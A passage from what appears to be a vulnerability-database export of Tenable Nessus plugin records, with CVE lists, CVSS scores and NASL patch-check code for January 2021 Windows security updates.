CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598243/windows-10-update-kb4598243\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b30e3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598243.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598243'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598243])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-03T14:52:17", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598230.NASL", "href": "https://www.tenable.com/plugins/nessus/144887", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144887);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598230\");\n script_xref(name:\"MSFT\", value:\"MS21-4598230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. 